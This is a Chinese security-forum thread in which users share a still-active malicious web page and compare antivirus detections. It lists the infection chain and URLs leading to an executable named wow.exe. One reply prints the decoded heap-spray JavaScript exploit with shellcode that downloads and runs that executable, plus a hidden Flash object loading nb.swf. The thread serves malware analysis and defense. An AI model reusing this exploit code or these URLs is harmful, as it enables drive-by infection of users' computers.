目前还有效的挂马网页

wjcharles

hxxp://web3.fimmu.com/sifa/images/wow.htm?www.3g3h.cn

来自卡卡每日网马，感觉卡卡没分析完整？
[root]http://web3.fimmu.com/sifa/images/wow.htm?www.3g3h.cn
    [iframe]http://web3.fimmu.com/sifa/img/flash.html
[virus]http://web3.fimmu.com/sifa/img/wow.exe
    [script]http://js.users.51.la/4573991.js

为什么我这在IE缓存中出现了nb.swf？

剑步如飞

KIS 2012 denied！

klinxun

趋势本地库搞定。

451102995

PCA...KILL

是昔流芳

恶意代码藏在nb.swf中,MD好像不能很好的解决.

帅就是帅

其实用户只要知道挂马有威胁而远离恶意页面就够了
也许这就是卡卡只用解出一个网马就行了的原因吧。。。。。话说我也喜欢这么干
卡卡就解了这段shellcode

1. %u7468%u7074%u2f3a%u772f%u6265%u2e33%u6966%u6d6d%u2e75%u6f63%u2f6d%u6973%u6166%u692f%u676d%u772f%u776f%u652e%u6578%u0000

复制代码

下面还有段需要解密，解后又是一段很古老的shellcode

function nb(){var netboom = unescape('%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e6e%u6373%u0072%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff'+nbcode);var nb=new Array();var nbpower=0x86000-(netboom.length*2);var nblol=unescape('%u0c0c%u0c0c');while(nblol.length<nbpower/2){nblol+=nblol;};var nbwm=nblol.substring(0,nbpower/2);delete nblol;for(i=0;i<270;i++){nb[i]=nbwm+nbwm+netboom;}}nb();document.write("<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="netboom" width="0" height="0" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"><param name="movie" value="nb.swf" /></object>");

blue_仰望

eav+chrome无反应。

也不知道谁

451102995 发表于 2011-6-25 01:59
PCA...KILL

熊猫云？我这里完全没反应啊

weipengsmile

cav kill

sy0923

小a拦截